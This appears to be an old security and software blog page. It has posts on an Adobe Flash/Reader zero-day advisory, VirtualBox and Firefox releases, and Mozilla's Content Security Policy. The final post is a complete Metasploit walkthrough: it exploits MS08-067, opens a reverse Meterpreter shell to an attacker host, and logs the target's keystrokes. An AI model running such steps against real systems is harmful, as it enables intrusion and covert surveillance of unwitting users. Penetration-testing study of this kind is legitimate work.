Zero-day vulnerability in Adobe Flash Player, Reader and Acrobat

Adobe is warning of a critical security vulnerability in its current Flash Player for Windows, Macintosh and Linux. Adobe Reader and Acrobat 9.x for all platforms are also affected. The vulnerability is already being actively exploited two ways, via crafted PDF documents and manipulated web sites (drive-by downloads). It’s reported that the exploit used in drive-by downloads can infect the PCs of users of both Internet Explorer and Firefox.

Adobe is working on a solution to the problem and believes that it will be able to provide an update by the 30th of July for Flash Player for Windows, Macintosh and Linux, with the Solaris version following a little later. The update for Adobe Reader and Acrobat, at least for Windows and Mac, is expected to appear on 31 July. An exact date for the Unix version has yet to be announced.

Adobe itself has so far only observed specific attacks against Reader and, until a patch is available, recommends that users of Reader for Windows either delete authplay.dll, rename it, or make it inaccessible. This file is normally located at C:\Program Files\Adobe\Reader 9.0\Reader\authplay.dll. Adobe does note though that as a result of moving or deleting authplay.dll “users will experience a non-exploitable crash or error message when opening a PDF that contains SWF content”. Instructions for other platforms were not issued by Adobe.

Alternatively, disabling Flash in Adobe Reader may help. Permissions can be changed under Edit, Preferences, then Multimedia Trust. Disabling JavaScript is said not to protect against the exploit. Adobe recommends Flash users treat untrusted pages with extreme caution, but doesn’t spell out how to put this into practice.

Source:
http://www.h-online.com/security/Zero-day-vulnerability-in-Adobe-Flash-Player-Reader-and-Acrobat–/news/113828

Posted in Coding, Internet, Security, Software | No Comments

VirtualBox 3.0.0 Released

VirtualBox is a family of powerful x86 virtualization products for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL).

Presently, VirtualBox runs on Windows, Linux, Macintosh and OpenSolaris hosts and supports a large number of guest operating systems including but not limited to Windows (NT 4.0, 2000, XP, Server 2003, Vista), DOS/Windows 3.x, Linux (2.4 and 2.6), Solaris and OpenSolaris, and OpenBSD.

VirtualBox is being actively developed with frequent releases and has an ever growing list of features, supported guest operating systems and platforms it runs on. VirtualBox is a community effort backed by a dedicated company: everyone is encouraged to contribute while Sun ensures the product always meets professional quality criteria.

Changelog:
http://www.virtualbox.org/wiki/Changelog

Download:
http://www.virtualbox.org/wiki/Downloads

Posted in Internet, Linux, Networking, Privacy, Security, Software, Windows | No Comments

Firefox 3.5 Released

Firefox 3.5 is based on the Gecko 1.9.1 rendering platform, which has been under development for the past year. Firefox 3.5 offers many changes over the previous version, supporting new web technologies, improving performance and ease of use.

Some of the notable features are:

• Support for the HTML5 <video> and <audio> elements including native support for Ogg Theora encoded video and Vorbis encoded audio.
• Improved tools for controlling your private data, including a Private Browsing Mode.
• Better web application performance using the new TraceMonkey JavaScript engine.
• The ability to share your location with websites using Location Aware Browsing.
• Support for native JSON, and web worker threads.
• Improvements to the Gecko layout engine, including speculative parsing for faster content rendering.
• Support for new web technologies such as: downloadable fonts, CSS media queries, new transformations and properties, JavaScript query selectors, HTML5 local storage and offline application storage, <canvas> text, ICC profiles, and SVG transforms.

Download:
http://www.mozilla.com/en-US/firefox/upgrade.html

Posted in Internet, Privacy, Security, Software | No Comments

Shutting Down XSS with Content Security Policy

For several years, Cross-Site Scripting (XSS) attacks have plagued many of the web’s most popular sites and victimized their users. At Mozilla, we’ve been working for the last year on a new technology called Content Security Policy, designed to shut these attacks down. We wanted to give a bit of background on this project as well as provide an update on our progress so far.

XSS is possible because all the content received as part of a web server response is treated with equal privilege by the requesting browser. JavaScript and other content included in a web page are all combined into a single security context which has full access to the DOM. Content Security Policy (CSP) provides a mechanism for sites to explicitly tell the browser which content is legitimate. The browser can then disregard any content which has not been blessed by the site.

In order to differentiate legitimate content from injected or modified content, CSP requires that all JavaScript for a page be 1) loaded from an external file, and 2) served from an explicitly approved host. This means that all inline script, javascript: URIs, and event-handling HTML attributes will be ignored. Only script included via a <script> tag pointing to a white-listed host will be treated as valid. Additionally, CSP allows several other common-sense security restrictions to be enforced.

Source:
http://blog.mozilla.com/security/2009/06/19/shutting-down-xss-with-content-security-policy/

Posted in Coding, Internet, Security | No Comments

Capturing Keystrokes With Metasploit

I was contacted privately about this, so I thought I would post a step-by-step guide on how to capture keystrokes from a target machine using Metasploit.

Instead of posting a ton of screenshots, I will provide the commands in text below, step-by-step:

msf > use exploit/windows/smb/ms08_067_netapi (only an example – use whatever exploit the target machine is vulnerable to)
msf exploit(ms08_067_netapi) > set rhost 192.168.1.104 (target)
rhost => 192.168.1.104
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.1.106 (attacker)
lhost => 192.168.1.106
msf exploit(ms08_067_netapi) > set target 3
target => 3
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.104:1049)

meterpreter > keyscan_start
Starting the keystroke sniffer…

(target machine)

meterpreter > keyscan_stop
Stopping the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
Top secret text.  Don’t tell my wife.
meterpreter > exit

[*] Meterpreter session 1 closed.
msf exploit(ms08_067_netapi) > exit
root@backtrack:/pentest/exploits/framework3#

Posted in Privacy, Security | 4 Comments